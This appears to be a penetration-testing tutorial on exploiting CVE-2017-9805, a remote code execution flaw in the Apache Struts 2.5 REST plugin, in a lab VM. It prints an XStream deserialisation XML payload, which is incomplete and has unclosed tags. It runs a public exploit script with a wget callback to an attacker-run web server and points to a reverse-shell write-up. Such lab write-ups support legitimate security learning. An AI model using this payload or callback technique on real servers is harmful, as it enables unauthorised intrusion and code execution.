Exploiting Apache Struts2.5 REST Plugin Vulnerability

What is Apache Struts ?

Apache Struts is a free, open-source, MVC framework for creating modern Java web applications. It enables the developer to create maintainable, extensible, and flexible web applications based on standard technologies, such as JSP pages, JavaBeans, resource bundles, and XML.

About the Vulnerability :

The Apache Struts2.5 REST Plugin Vulnerability allow remote code execution on vulnerable server. This particular vulnerability is a result of unsafe de-serialisation in Java Struts REST plugin with the XStream handler when handling XML payloads received with a “Content-Type” set to “application/xml”. The version affected by this vulnerability is Apache Struts 2.5 < 2.5.12. The vulnerability has been assigned CVE-2017–9805 and is rated Critical.

Setting up Lab Environment To Test :

Download Apache Struts 2.5 from here : Download Link
Setup Apache tomcat server running on port 8080, and install the above App on it.

Or you can just use BasicPentesting2 VM to test this vulnerability. You can download it from here : Download Link

URL to access Apache struts App

Exploitation :

The vulnerability can be triggered by sending a malicious XML POST payload with the “Content-Type” header set to “application/xml”. The XML Payload is :
       <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
           <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
             <is class="javax.crypto.CipherInputStream">
               <cipher class="javax.crypto.NullCipher">
                 <serviceIterator class="javax.imageio.spi.FilterIterator">
                   <iter class="javax.imageio.spi.FilterIterator">
                     <iter class="java.util.Collections$EmptyIterator"/>
                     <next class="java.lang.ProcessBuilder">
                   <filter class="javax.imageio.ImageIO$ContainsFilter">
               <input class="java.lang.ProcessBuilder$NullInputStream"/>
     <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>

Where at line 14, the command is placed.

There is an exploit available from command execution : https://www.exploit-db.com/exploits/42627

Testing the vulnerability :

Attacker System IP :
Target Server IP :

We are going to use above python exploit to test the vulnerability :
 $ python3 exploit.py "Command to execute"
Unfortunately the exploit does not return the output of the executed command, so to clarify the command execution we are going to start an HTTP serer on port 1234 and try to call that server through the Apache Struts Server and see the logs if it is called or not.

Start an HTTP Server on port 1234, i am using php interpreter
 php -S
 PHP 7.2.24-0ubuntu0.18.04.1 Development Server started at Fri Dec 27 18:31:57 2019
 Listening on
 Document root is /home/ajay
 Press Ctrl-C to quit.
Now run the exploit :
 $ python3 exploit.py "wget"
And our local web server is called by the Apache Struts server, means we can ge remote code execution on the struts server.

To get a reverse shell on target server , checkout my BasicPentesting2 writeup : Link